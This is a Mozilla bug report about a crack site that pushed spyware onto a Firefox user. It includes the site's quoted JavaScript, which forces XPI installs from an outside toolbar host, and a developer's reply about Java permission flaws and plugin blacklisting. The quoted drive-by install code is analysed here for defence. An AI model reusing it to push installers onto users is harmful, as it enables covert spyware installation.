Closed
Bug 284384
Opened 19 years ago
Closed 19 years ago
[security] Site starts up IE and installs spyware
Categories
(Core :: Security, defect)
Tracking
()
RESOLVED
INVALID
People
(Reporter: u81239, Assigned: dveditz)
Details
(Whiteboard: [sg:needinfo])
Attachments
(3 files)
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b2) Gecko/20050223 Firefox/1.0+ Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b2) Gecko/20050223 Firefox/1.0+ If you go to the cracks.am site, at http://www.cracks.am/d.x?65093 (excuse the illegal nature of this link), it will open an IE window and install spyware. I think it's probably doing something with JavaScript, that's why I filed it into this category, but I really wouldn't know (and don't feel like finding it out myself at the risk of getting infected with spyware time after time after time). ~Grauw Reproducible: Always Steps to Reproduce: 1. Have IE installed on your computer 2. Go to http://www.cracks.am/d.x?65093 3. Get infected with spyware through the opened IE window Actual Results: Spyware got installed. Amongst others SideFind, CoolWebSearch, Performance-something and more (iirc). Expected Results: I should be able to surf securely and safely.
The offending JavaScript code seems to be this:
else {
if(!(GetCookie_protect("exelimiter") || exelimiter)) {
if (bname == 'Netscape') {
if (InstallTrigger.updateEnabled()) {
InstallTrigger.install({'Content Access Plugin 1.01' :
'http://www.xxxtoolbar.com/ist/softwares/v3.0/protect_regular.xpi'});
} else {
location.replace('http://www.xxxtoolbar.com/ist/softwares/bundlers//istinstall_regular.xpi');
}
}
else {
location.replace('http://www.xxxtoolbar.com/ist/softwares/bundlers//istinstall_regular.xpi');
}
SetCookie_protect("exelimiter","1", 0);
exelimiter=1
setTimeout('location.replace(gurl)',10000);
} else { location.replace(gurl); }
}
It seems to try to install an XPI.
Now that I mention it, I do recall at some time having been prompted an XPI
install window on that site. I never clicked ok though! - I clicked on the [X]
close button, but the XPI was still installed! (apparantly it still and really
is - wonder how to get rid of it)
~GrauwI risked my life to get you guys the source of the offending page :).
|
Assignee | |
Comment 5•19 years ago
|
||
If you're running Firefox this site shouldn't be able to launch a XPI -- you should get the infobar at the top saying an install attempt from that site was blocked. If you unblocked the site and then agreed to install something, well, it was installed. Hard to protect against that. (I'll get back to the close button thing in a bit...) When I opened the captured page it also tried to install something using java, popping up a big scary permission dialog. Do you have Java? If so, what version? (check using about:plugins). I ask because we've seen similar sites take advantage of a Sun JRE flaw in 1.4.2_05 and below to install things without notice. The site appears to throw a lot of potential exploits against different browsers so it *might* use the older java flaw in addition to the straight-forward privilege dialog I saw. Back to the install close button thing. That would be a serious bug, obviously, but not one I've ever seen. Are you sure it was a XPI that ran? If it did it would leave a record in install.log in the installation directory (or your profile if the install dir is write protected). Look and see what you find there. Also interesting is your initial claim that it opened an IE window, and then got infected through that. It would certainly be dangerous if something could open an IE window, but there's no evidence of how it did that. Probably the IE window was opened by the exploit itself after it was already installed.
Whiteboard: [sg:needinfo]
Now that you mention it, a while earlier on that site, I had a Java popup asking me whether it could install the software appear with the Yes button right under my mouse cursor when I clicked, so I accidentally clicked yes... :/
I uninstalled Java 1.4.0.03 and installed 1.5.0.02 and the problem is gone... I'm happy to be rid of it, but there will be millions of users still using an older Java version just like me. The fact that the Java download page is quite cryptic for the ‘dummy’ user doesn’t help either, even I had trouble finding the proper download package. I can't help that a number of Firefox's main ‘security’ problems are related to plugins. This, and I heard about Flash popups as well. Is there a plan to address these kind of issues? ~Grauw
|
|
Assignee | |
Comment 8•19 years ago
|
||
(In reply to comment #7) > I can't help that a number of Firefox's main ‘security’ problems are related > to plugins. This, and I heard about Flash popups as well. Is there a plan to > address these kind of issues? Yes, we have plans to include plugins in the extension update service, blacklist (disable) extensions and plugins with known critical vulnerabilities, block plugins from opening windows, and more. Don't have all the bug numbers handy. We're also looking into whether it's possible to block Java from asking for enhanced permissions except for whitelisted sites. People could list their corporate intranet apps and then not worry about malicious Java permission dialogs popping up elsewhere. Your comment 6 suggests the Java permission dialog might be vulnerable to something like bug 162020, all the more reason to keep it from coming up. Since the spyware was installed after you gave it explicit permission to do so, albeit mistakenly, this bug ought to be closed. Rest assured that we are addressing the related issues in other bugs, though.
Group: security
Status: UNCONFIRMED → RESOLVED
Closed: 19 years ago
Resolution: --- → INVALID
You need to log in
before you can comment on or make changes to this bug.
Description
•